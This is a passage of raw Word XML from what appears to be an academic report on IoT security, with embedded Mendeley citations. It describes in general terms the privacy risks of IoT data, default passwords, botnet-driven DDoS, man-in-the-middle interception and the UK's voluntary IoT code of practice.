        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/3180465.3180470","abstract":"The paradigm shift to the Internet of Things (IoT) and the emergence of the edge computing concept have brought huge potentials for various future IoT application scenes such as smart home, smart transportation, smart health, smart grids, and smart energy. It also brings a series of new Cybersecurity challenges. We envision that many new research and innovation opportunities will emerge in the conjunction of \"Cybersecurity + edge computing + IoT + AI\". In this article, we will discuss the major new Cybersecurity challenges and the related opportunities in such a vision.","author":[{"dropping-particle":"","family":"Pan","given":"Jianli","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang","given":"Zhicheng","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Cybersecurity Challenges and Opportunities in the New \"Edge Computing + IoT\" World","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=d1c6e893-77d8-47bb-b193-9b4c395de5de"]}],"mendeley":{"formattedCitation":"[42]","plainTextFormattedCitation":"[42]","previouslyFormattedCitation":"[42]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[42]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA62AED" w14:textId="6FCEE4E3" w:rsidR="001331E5" w:rsidRDefault="001331E5" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ECDF4B" w14:textId="6D11CD25" w:rsidR="004325F7" w:rsidRDefault="001331E5" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>IoT</w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t xml:space="preserve"> devices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also produce massive volumes of data that can be analysed by data </w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t>analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> experts </w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t xml:space="preserve">to reveal personal and/or company information from the </w:t>
      </w:r>
      <w:r w:rsidR="00381D6A">
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidR="009C0490">
        <w:t xml:space="preserve">that is recorded and sent from IoT devices </w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t xml:space="preserve">that are communicating with a cloud-based </w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:lastRenderedPageBreak/>
        <w:t>server, such as</w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t xml:space="preserve"> ‘Amazon Alexa’, </w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t xml:space="preserve">‘Smart Building’ sensors </w:t>
      </w:r>
      <w:r w:rsidR="00386F2D">
        <w:t xml:space="preserve">etc. </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/j.future.2015.09.021","ISSN":"0167739X","abstract":"Cloud computing and Internet of Things (IoT) are two very different technologies that are both already part of our life. Their adoption and use are expected to be more and more pervasive, making them important components of the Future Internet. A novel paradigm where Cloud and IoT are merged together is foreseen as disruptive and as an enabler of a large number of application scenarios. In this paper, we focus our attention on the integration of Cloud and IoT, which is what we call the CloudIoT paradigm. Many works in literature have surveyed Cloud and IoT separately and, more precisely, their main properties, features, underlying technologies, and open issues. However, to the best of our knowledge, these works lack a detailed analysis of the new CloudIoT paradigm, which involves completely new applications, challenges, and research issues. To bridge this gap, in this paper we provide a literature survey on the integration of Cloud and IoT. Starting by analyzing the basics of both IoT and Cloud Computing, we discuss their complementarity, detailing what is currently driving to their integration. Thanks to the adoption of the CloudIoT paradigm a number of applications are gaining momentum: we provide an up-to-date picture of CloudIoT applications in literature, with a focus on their specific research challenges. These challenges are then analyzed in details to show where the main body of research is currently heading. We also discuss what is already available in terms of platforms-both proprietary and open source-and projects implementing the CloudIoT paradigm. Finally, we identify open issues and future directions in this field, which we expect to play a leading role in the landscape of the Future Internet.","author":[{"dropping-particle":"","family":"Botta","given":"Alessio","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Donato","given":"Walter","non-dropping-particle":"De","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Persico","given":"Valerio","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pescapé","given":"Antonio","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Future Generation Computer Systems","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"Integration of Cloud computing and Internet of Things: A survey","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=7e953db3-f279-494c-8ac4-351feffe1634"]}],"mendeley":{"formattedCitation":"[43]","plainTextFormattedCitation":"[43]","previouslyFormattedCitation":"[43]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[43]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4CBD8" w14:textId="77777777" w:rsidR="004325F7" w:rsidRDefault="004325F7" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2FD9A3" w14:textId="5AE6EE4C" w:rsidR="001331E5" w:rsidRDefault="00386F2D" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data is considered the new oil </w:t>
      </w:r>
      <w:r w:rsidR="00213A74">
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data analytics for marketing research is highly lucrative for technology companies who sell the </w:t>
      </w:r>
      <w:r w:rsidR="004325F7">
        <w:t xml:space="preserve">collected IoT </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">data to marketing companies </w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t xml:space="preserve">implement </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tailored algorithms</w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t xml:space="preserve"> on the raw data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t>that then correlate and organise the data in order to identify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t>consumer traits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to target advertise </w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t>and/or profile the people or companies that own and operate these devices, similarly to social networking websites who</w:t>
      </w:r>
      <w:r w:rsidR="004325F7">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t xml:space="preserve"> offer free access to their services in exchange for personal data that they sell, which the majority of users are </w:t>
      </w:r>
      <w:r w:rsidR="00061DC7">
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidR="000E4AC2">
        <w:t>aware of.</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.forbes.com/sites/bernardmarr/2018/03/05/heres-why-data-is-not-the-new-oil/#7b3a3c113aa9","abstract":"data new oil","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"Forbes","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"forbes.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Here's Why Data Is Not The New Oil","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=df1bbdc4-32e4-3a16-bb4a-c0c3f0bca824"]}],"mendeley":{"formattedCitation":"[44]","plainTextFormattedCitation":"[44]","previouslyFormattedCitation":"[44]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[44]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA2A19" w14:textId="605DC890" w:rsidR="001D53F1" w:rsidRDefault="001D53F1" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FE3395" w14:textId="5A3A42C5" w:rsidR="00BA6FC9" w:rsidRDefault="001D53F1" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security within IoT devices is a major concern within the networking industry because the companies who produce these devices are software and electronics companies </w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> either do</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve"> not </w:t>
      </w:r>
      <w:r>
        <w:t>consider the network security of the devices or knowingly neglect the security to lower their production costs to bolster their profit margins.</w:t>
      </w:r>
      <w:r w:rsidR="00FB4B6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389360B6" w14:textId="08F1EBCE" w:rsidR="00F818E2" w:rsidRDefault="00F818E2" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409399A5" w14:textId="48EC15EF" w:rsidR="008471E1" w:rsidRDefault="00F818E2" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The majority of IoT devices do not encrypt the data that is being </w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>transmitted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the servers</w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t xml:space="preserve"> that operate them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and either have default usernames and passwords </w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t xml:space="preserve">that cannot be changed to access the devices management interface </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that can be </w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>effortlessly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> researched and located on the Internet from the IoT manufacturers manual</w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to remotely access the devices or they have no passwords at all. </w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve">These serious cybersecurity vulnerabilities make it easy for </w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> actors to access the</w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>se vulnerable IoT</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> devices to spy and/or install malware that can be tailored for specific purposes</w:t>
      </w:r>
      <w:r w:rsidR="008471E1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/3190645.3190678","abstract":"Compromising IoT devices to build botnets and disrupt critical infrastructure is an existential threat. Refrigerators, washing machines, DVRs, security cameras, and other consumer goods are high value targets for attackers due to inherent security weaknesses, a lack of consumer security awareness, and an absence of market forces or regulatory requirements to motivate IoT security. As a result of the deeciencies, attackers have quickly assembled large scale botnets of IoT devices to disable Internet infrastructure and deny access to dominant web properties with near impunity. IoT malware is often transmitted from host to host similar to how biological viruses spread in populations. Both biological viruses and computer malware may exhibit epidemic characteristics when spreading in populations of vulnerable hosts. Vaccines are used to stimulate resistance to biological viruses by inoculating a suucient number of hosts in the vulnerable population to limit the spread of the biological virus and prevent epidemics. Inoculation programs may be viewed as a human instigated epidemic that spreads a vaccine in order to mitigate the damage from a biological vir</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve">us. In this paper we propose a technique to create an inoculation epidemic for IoT devices using a novel variation of a SIS epidemic model and show experimental results that indicate utility of the approach. CCS CONCEPTS </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>•</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Security and privacy </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>→</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Malware and its mitigation; </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>•</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Computing methodologies </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>→</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Modeling methodologies; </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>•</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Social and professional topics </w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>→</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Malware / spyware crime;","author":[{"dropping-particle":"","family":"Jerkins","given":"James A.","non-dropping-particle":"","parse-names":false,"suf</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>fix":""},{"dropping-particle":"","family":"Stupiansky","given":"Jillian","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Mitigating IoT insecurity with inoculation epidemics","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=e0e227de-a89e-4434-9f4c-e6b898673794"]}],"mendeley":{"formattedCitation":"[45]","plainTextFormattedCitation":"[45]","previouslyFormattedCitation":"[45]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"When you start to think about all the things that could go wrong when browsing the Internet, the web starts to look like a pretty scary place. Luckily, Internet users as a whole are getting far more savvy, and better at recognizing risky online behavior. While pages with a dozen download buttons – or auto-checked boxes that tricked us into downloading things we didn’t want – are no longer quite as effective as they once were, that doesn’t mean there aren’t hackers out there right now trying to come up with new methods of deception. In order to protect ourselves from these threats it’s important to understand just what they are, and how they differ.","author":[{"dropping-particle":"","family":"Clark","given":"Bryan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"MakeUseOf","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"Viruses, Spyware, Malware, etc. Explained: Understanding Online Threats","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=97e78a1f-eaf9-4ad6-9c14-63783b222088"]}],"mendeley":{"formattedCitation":"[46]","plainTextFormattedCitation":"[46]","previouslyFormattedCitation":"[46]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[46]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AFB4E" w14:textId="77777777" w:rsidR="008471E1" w:rsidRDefault="008471E1" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EFEE77" w14:textId="0138BA9D" w:rsidR="00F818E2" w:rsidRDefault="008471E1" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t>he most common IoT malware is ‘Bot’ malware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which only contains a few lines of code,</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> that is used to implement a Distributed Denial of Service (DDoS) attack by utilising millions of infected IoT devices to send data to a certain server </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t xml:space="preserve">across the Internet, </w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t>causing the server to shut</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve">down because of the extraordinarily high traffic being processed </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> the servers that the hardware cannot cope with</w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t xml:space="preserve">‘Bot’ DDOS </w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t>ck</w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>one of</w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve"> the most basic </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attacks to leverage </w:t>
      </w:r>
      <w:r w:rsidR="00753A52">
        <w:t xml:space="preserve">but one of the most efficient cybersecurity attacks to leverage against a company that cripples their network so that clients and/or consumers cannot access their websites or applications stored within these servers that costs companies billions of pounds each year. </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"978-1-931971-40-9","abstract":"The Mirai botnet, composed primarily of embedded and IoT devices, took the Internet by storm in late 2016 when it overwhelmed several high-profile targets with massive distributed denial-of-service (DDoS) attacks. In this paper, we provide a seven-month retrospective analysis of Mirai's growth to a peak of 600k infections and a history of its DDoS victims. By combining a variety of measurement perspectives, we analyze how the bot-net emerged, what classes of devices were affected, and how Mirai variants evolved and competed for vulnerable hosts. Our measurements serve as a lens into the fragile ecosystem of IoT devices. We argue that Mirai may represent a sea change in the evolutionary development of botnets-the simplicity through which devices were infected and its precipitous growth, demonstrate that novice malicious techniques can compromise enough low-end devices to threaten even some of the best-defended targets.","author":[{"dropping-particle":"","family":"Antonakakis","given":"Manos","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"April","given":"Tim","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bailey","given":"Michael","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bursztein","given":"Elie","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cochran","given":"Jaime","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Durumeric","given":"Zakir","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alex Halderman","given":"J","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Menscher","given":"Damian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Seaman","given":"Chad","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sullivan","given":"Nick","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Thomas","given":"Kurt","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhou","given":"Yi","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Antonakakis Tim April","given":"Manos","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bernhard Elie Bursztein","given":"Matthew","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cochran Zakir Durumeric Alex Halderman Luca Invernizzi","given":"Jaime J","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kallitsis","given":"Michalis","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kumar","given":"Deepak","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lever Zane Ma","given":"Chaz","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mason","given":"Joshua","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sullivan Kurt Thomas","given":"Nick","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"USENIX Security Symposium","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Understanding the Mirai Botnet","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=d1b8f13d-255c-4dad-ac1a-d531535326b3"]}],"mendeley":{"formattedCitation":"[47]","plainTextFormattedCitation":"[47]","previouslyFormattedCitation":"[47]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[47]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3F878" w14:textId="717FC232" w:rsidR="001B745D" w:rsidRDefault="001B745D" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D49F79E" w14:textId="0FA3D34E" w:rsidR="001B745D" w:rsidRDefault="001B745D" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The unencrypted traffic on the majority of vulnerable IoT devices also makes it easy for attackers to leverage a Man in the Middle (MitM) attack, in order to capture and steal the data being transmitted wirelessly from the devices. </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html","abstract":"MITM attack","accessed":{"date-parts":[["2019","1","22"]]},"author":[{"dropping-particle":"","family":"Norton","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"norton.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"What is a man-in-the-middle attack?","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=5941a9c8-74db-34a9-88fc-6c795143c9fe"]}],"mendeley":{"formattedCitation":"[48]","plainTextFormattedCitation":"[48]","previouslyFormattedCitation":"[48]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[48]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E4301" w14:textId="77777777" w:rsidR="00D83E75" w:rsidRDefault="00D83E75" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668650E5" w14:textId="78D2809F" w:rsidR="00121F48" w:rsidRDefault="00923407" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In 2018 the UK</w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC3448">
        <w:t xml:space="preserve">NCSA </w:t>
      </w:r>
      <w:r>
        <w:t>outlined a security framework for IoT companies to follow</w:t>
      </w:r>
      <w:r w:rsidR="00EB29B1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is called; </w:t>
      </w:r>
      <w:r w:rsidRPr="00856D4C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>‘Code of Practice for Consumer IoT Security’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> although it is only optional and not mandatory to follow by law</w:t>
      </w:r>
      <w:r w:rsidR="00121F48">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which has been firmly scrutinised by cybersecurity professionals within the UK for not</w:t>
      </w:r>
      <w:r w:rsidR="00121F48">
        <w:t xml:space="preserve"> only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> being very ambiguous within how security should be implemented </w:t>
      </w:r>
      <w:r w:rsidR="00121F48">
